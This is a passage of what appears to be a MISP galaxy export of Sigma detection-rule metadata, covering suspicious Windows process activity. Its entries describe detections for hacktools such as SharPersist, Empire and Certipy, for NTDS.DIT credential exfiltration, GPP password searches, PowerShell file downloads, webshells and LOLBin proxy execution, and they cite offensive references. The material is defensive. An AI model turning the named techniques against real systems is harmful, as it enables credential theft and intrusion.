"42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e762605-34a8-406d-b72e-c1a089313320", "value": "Potential Fake Instance Of Hxtsr.EXE Executed" }, { "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpersist.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/mandiant/SharPersist", "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpersist.yml" ], "tags": [ "attack.persistence", "attack.t1053" ] }, "related": [ { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4", "value": "HackTool - SharPersist Execution" }, { "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020", "value": "Suspicious RunAs-Like Flag Combination" }, { "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_ntds.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://pentestlab.blog/tag/ntds-dit/", "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/zcgonvh/NTDSDumpEx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "value": "Suspicious Process Patterns NTDS.DIT Exfil" }, { "description": "Detects addition of users to the local administrator group via \"Net\" or \"Add-LocalGroupMember\".", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_susp_add_user_local_admin_group.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "value": "User Added to Local Administrators Group" }, { "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-06", "falsepositive": [ "System administrator usage" ], "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "value": "Renamed Sysinternals Sdelete Execution" }, { "description": "Detects potentially suspicious execution of the Qemu utility in a Windows environment.\nThreat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)", "creation_date": "2024-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_qemu_suspicious_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.qemu.org/docs/master/system/invocation.html#hxtool-5", "https://securelist.com/network-tunneling-with-qemu/111803/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_qemu_suspicious_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1090", "attack.t1572" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5fc297ae-25b6-488a-8f25-cc12ac29b744", "value": "Potentially Suspicious Usage Of Qemu" }, { "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-17", "falsepositive": [ "Rare intended use of hidden services" ], "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e", "value": "Abuse of Service Permissions to Hide Services Via Set-Service" }, { "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wuauclt_dll_loading.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", "https://dtm.uk/wuauclt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wuauclt_dll_loading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.execution" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", "value": "Proxy Execution Via Wuauclt.EXE" }, { "description": "Detects port forwarding activity via SSH.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-12", "falsepositive": [ "Administrative activity using a remote port forwarding to a local port" ], "filename": "proc_creation_win_ssh_port_forward.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml" ], "tags": [ "attack.command-and-control", "attack.lateral-movement", "attack.t1572", "attack.t1021.001", "attack.t1021.004" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", "value": "Port Forwarding Activity Via SSH.EXE" }, { "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", "meta": { "author": "Florian Roth (Nextron Systems), MSTI (query)", "creation_date": "2022-10-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_webshell_chopper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" ], "tags": [ "attack.persistence", "attack.t1505.003", "attack.t1018", "attack.t1033", "attack.t1087" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "value": "Chopper Webshell Process Pattern" }, { "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", "meta": { "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "creation_date": "2021-12-20", "falsepositive": [ "Administrative activity", "Scripts and administrative tools used in the monitored environment", "Monitoring activity" ], "filename": "proc_creation_win_susp_system_user_anomaly.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://tools.thehacker.recipes/mimikatz/modules", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1134", "attack.t1003", "attack.t1027" ] }, "related": [ { "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "value": "Suspicious SYSTEM User Process Creation" }, { "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "WSL (Windows Sub System For Linux)" ], "filename": "proc_creation_win_mstsc_remote_connection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774", "value": "New Remote Desktop Connection Initiated Via Mstsc.EXE" }, { "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-01", "falsepositive": [ "Legitimate use when App-v is deployed" ], "filename": "proc_creation_win_lolbin_scriptrunner.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", "value": "Use of Scriptrunner.exe" }, { "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", "meta": { "author": "David Burkett, @signalblur", "creation_date": "2019-12-28", "falsepositive": [ "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", "value": "Suspect Svchost Activity" }, { "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-18", "falsepositive": [ "Likelihood is related to how often the paths are used in the environment" ], "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e22722b-dfb1-4508-a911-49ac840b40f8", "value": "Suspicious Mstsc.EXE Execution With Local RDP File" }, { "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", "meta": { "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel", "creation_date": "2019-01-29", "falsepositive": [ "Legitimate administration activity", "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" ], "filename": "proc_creation_win_netsh_port_forwarding.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml" ], "tags": [ "attack.lateral-movement", "attack.defense-evasion", "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "value": "New Port Forwarding Rule Added Via Netsh.EXE" }, { "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-03-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_inline_vbs.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_inline_vbs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", "value": "Suspicious Rundll32 Invoking Inline VBScript" }, { "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-09-12", "falsepositive": [ "Legitimate usage of remote Powershell, e.g. for monitoring purposes." ], "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", "value": "Remote PowerShell Session Host Process (WinRM)" }, { "description": "Detects suspicious powershell command line parameters used in Empire", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-04-20", "falsepositive": [ "Other tools that incidentally use the same command line parameters" ], "filename": "proc_creation_win_hktl_empire_powershell_launch.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "value": "HackTool - Empire PowerShell Launch Parameters" }, { "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-05-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml" ], "tags": [ "attack.initial-access", "attack.t1190", "attack.lateral-movement", "attack.t1210", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1012f107-b8f1-4271-af30-5aed2de89b39", "value": "Terminal Service Process Spawn" }, { "description": "Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.\n", "meta": { "author": "pH-T (Nextron Systems), Sittikorn Sangrattanapitak", "creation_date": "2023-04-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_certipy.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/ly4k/Certipy", "https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certipy.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1649" ] }, "related": [ { "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "value": "HackTool - Certipy Execution" }, { "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", "meta": { "author": "Bhabesh Raj", "creation_date": "2022-03-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ultravnc_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine", "https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html", "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml" ], "tags": [ "attack.lateral-movement", "attack.g0047", "attack.t1021.005" ] }, "related": [ { "dest-uuid": "01327cde-66c4-4123-bf34-5f258d59457b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599", "value": "Suspicious UltraVNC Execution" }, { "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", "meta": { "author": "frack113", "creation_date": "2022-12-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_unregmp2.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "727454c0-d851-48b0-8b89-385611ab0704", "value": "Lolbin Unregmp2.exe Use As Proxy" }, { "description": "Detects execution of the \"cloudflared\" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.", "meta": { "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-17", "falsepositive": [ "Legitimate usage of Cloudflared tunnel." ], "filename": "proc_creation_win_cloudflared_tunnel_run.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cloudflare/cloudflared", "https://developers.cloudflare.com/cloudflare-one/connections/connect-apps", "https://blog.reconinfosec.com/emergence-of-akira-ransomware-group", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml" ], "tags": [ "attack.command-and-control", "attack.t1102", "attack.t1090", "attack.t1572" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a019ffc-3580-4c9d-8d87-079f7e8d3fd4", "value": "Cloudflared Tunnel Execution" }, { "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", "meta": { "author": "frack113", "creation_date": "2021-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_gpp_passwords.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" ], "tags": [ "attack.credential-access", "attack.t1552.006" ] }, "related": [ { "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "value": "Findstr GPP Passwords" }, { "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-08-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.command-and-control", "attack.t1104", "attack.t1105" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", "value": "PowerShell DownloadFile" }, { "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_rurat.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml" ], "tags": [ "attack.defense-evasion", "attack.collection", "attack.command-and-control", "attack.discovery", "attack.s0592" ] }, "uuid": 